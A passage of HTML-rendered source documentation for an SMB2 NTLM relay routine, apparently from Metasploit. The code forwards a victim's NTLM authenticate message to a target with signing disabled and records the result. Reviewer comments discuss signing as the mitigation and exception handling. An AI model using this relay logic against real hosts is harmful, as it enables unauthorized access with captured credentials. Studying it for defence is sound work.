<span class='id identifier rubyid_packet'>packet</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_credits'>credits</span> <span class='op'>=</span> <span class='int'>127</span>
<!-- The request is sent with signing_enabled cleared. NOTE(review): general NTLM relay background, not shown in this listing: a relaying party does not hold the session key, so requiring SMB signing on targets is the usual mitigation; confirm against current hardening guidance. -->
<span class='id identifier rubyid_packet'>packet</span><span class='period'>.</span><span class='id identifier rubyid_security_mode'>security_mode</span><span class='period'>.</span><span class='id identifier rubyid_signing_enabled'>signing_enabled</span> <span class='op'>=</span> <span class='int'>0</span>
<span class='id identifier rubyid_packet'>packet</span><span class='period'>.</span><span class='id identifier rubyid_set_security_buffer'>set_security_buffer</span><span class='lparen'>(</span><span class='id identifier rubyid_client_type3_msg'>client_type3_msg</span><span class='rparen'>)</span>
<span class='comment'># packet.buffer = victim_type3_message
</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='id identifier rubyid_send_recv'>send_recv</span><span class='lparen'>(</span><span class='id identifier rubyid_packet'>packet</span><span class='rparen'>)</span>
<!-- Only the request packet is passed to update_preauth_hash, and only when the dialect string is '0x0311'. NOTE(review): whether the response is also hashed is not visible here (send_recv and smb2_ntlmssp_final_packet are defined elsewhere); verify. -->
<span class='kw'>if</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_packet'>packet</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<!-- response is rebound to whatever smb2_ntlmssp_final_packet returns; the fields read afterwards (session_flags, smb2_header) suggest a parsed session setup response, but the helper is defined elsewhere. -->
<span class='comment'># raw = smb2_ntlmssp_authenticate(victim_type3_message, @session_id)
</span> <span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='id identifier rubyid_smb2_ntlmssp_final_packet'>smb2_ntlmssp_final_packet</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='rparen'>)</span>
<!-- Latch @session_encrypt_data to true when @smb3 is set, the flag is not already set, and the reply has the encrypt_data session flag equal to 1. -->
<span class='kw'>if</span> <span class='ivar'>@smb3</span> <span class='op'>&amp;&amp;</span> <span class='op'>!</span><span class='ivar'>@session_encrypt_data</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_session_flags'>session_flags</span><span class='period'>.</span><span class='id identifier rubyid_encrypt_data'>encrypt_data</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='ivar'>@session_encrypt_data</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='kw'>end</span>
<!-- NOTE(review): find_by_retval(...).first presumably yields nil when the status value matches no known NTStatus, so nt_status may be nil; confirm that RelayResult consumers handle that. -->
<span class='const'><span class='object_link'><a href="../../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>RelayResult</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='label'>nt_status:</span> <span class='const'><span class='object_link'><a href="../../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='period'>.</span><span class='id identifier rubyid_find_by_retval'>find_by_retval</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span>
<span class='rparen'>)</span>
<span class='kw'>end</span>
<!-- NOTE(review): rescue ::Exception catches every exception class, including Interrupt and SystemExit, and turns it into a logged nil; narrowing to ::StandardError would let process level signals propagate. The failure is reported twice, through elog (with the exception attached) and through logger.error. -->
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'>Exception</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unable to authenticate to target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> via relay</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_error'>error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</body>
</html>